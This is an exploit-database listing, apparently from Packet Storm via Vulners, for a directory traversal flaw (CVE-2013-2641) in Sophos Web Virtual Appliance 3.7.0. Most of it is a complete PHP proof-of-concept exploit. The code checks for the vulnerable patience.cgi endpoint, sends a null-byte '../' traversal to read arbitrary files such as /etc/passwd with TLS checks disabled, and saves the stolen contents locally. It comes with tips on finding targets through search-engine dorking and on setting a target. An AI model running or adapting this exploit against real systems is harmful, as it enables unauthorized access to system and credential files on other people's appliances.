Lucene search
K

📄 Sophos Web Virtual Appliance 3.7.0 Directory Traversal

🗓️ 20 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 122 Views

Sophos Web Virtual Appliance 3.7.0 directory traversal flaw exposed via PoC PHP code to read files.

Related
Code
=============================================================================================================================================
    | # Title     : Sophos Web Virtual Appliance v3.7.0 Directory Traversal Vulnerability                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.sophos.com/en-us/support/downloads/virtual-web-appliance                                                        |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code allows you to exploit the Traversal Directory vulnerability in the Sophos Web Protection Appliance to retrieve any file from the system. 
    
       cURL was used to execute HTTP requests, and the response was handled to verify the success of the attack and save the retrieved content to a local file.
       
       (Related : https://packetstorm.news/files/id/180832/ Linked CVE numbers: CVE-2013-2641 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 84
    
    [+] PayLoad :
    
    <?php
    
    class SophosTraversalExploit {
        private $target;
        private $port;
        private $filepath;
        private $depth;
    
        public function __construct($target, $port = 443, $filepath = '/etc/passwd', $depth = 2) {
            $this->target = $target;
            $this->port = $port;
            $this->filepath = $filepath;
            $this->depth = $depth;
        }
    
        private function my_basename($filename) {
            return basename(str_replace('\\', '/', $filename));
        }
    
        private function is_proficy() {
            $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi";
            $response = $this->send_request($url);
    
            if ($response && strpos($response['body'], 'The patience page request was not valid') !== false) {
                return true;
            }
            return false;
        }
    
        private function read_file() {
            $traversal_path = str_repeat('../', $this->depth) . $this->filepath . "%00";
            echo "Retrieving file contents...\n";
            
            $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi?id=" . urlencode($traversal_path);
            $response = $this->send_request($url);
    
            if ($response && ($response['code'] == 200 || $response['code'] == 500) && isset($response['headers']['X-Sophos-PatienceID'])) {
                return $response['body'];
            } else {
                echo "Error: " . $response['code'] . "\n" . $response['body'] . "\n";
                return null;
            }
        }
    
        private function send_request($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            
            $body = curl_exec($ch);
            $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $headers = curl_getinfo($ch);
            
            curl_close($ch);
            
            return ['code' => $code, 'body' => $body, 'headers' => $headers];
        }
    
        public function run() {
            echo "Checking if it's a Sophos Web Protect Appliance with the vulnerable component...\n";
            
            if ($this->is_proficy()) {
                echo "Check successful\n";
            } else {
                echo "Sophos Web Protect Appliance vulnerable component not found\n";
                return;
            }
    
            $contents = $this->read_file();
            if ($contents === null) {
                echo "File not downloaded\n";
                return;
            }
    
            $file_name = $this->my_basename($this->filepath);
            file_put_contents($file_name, $contents);
            echo "File saved as: " . $file_name . "\n";
        }
    }
    
    $exploit = new SophosTraversalExploit('target.com');
    $exploit->run();
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Feb 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 25
EPSS0.7099
122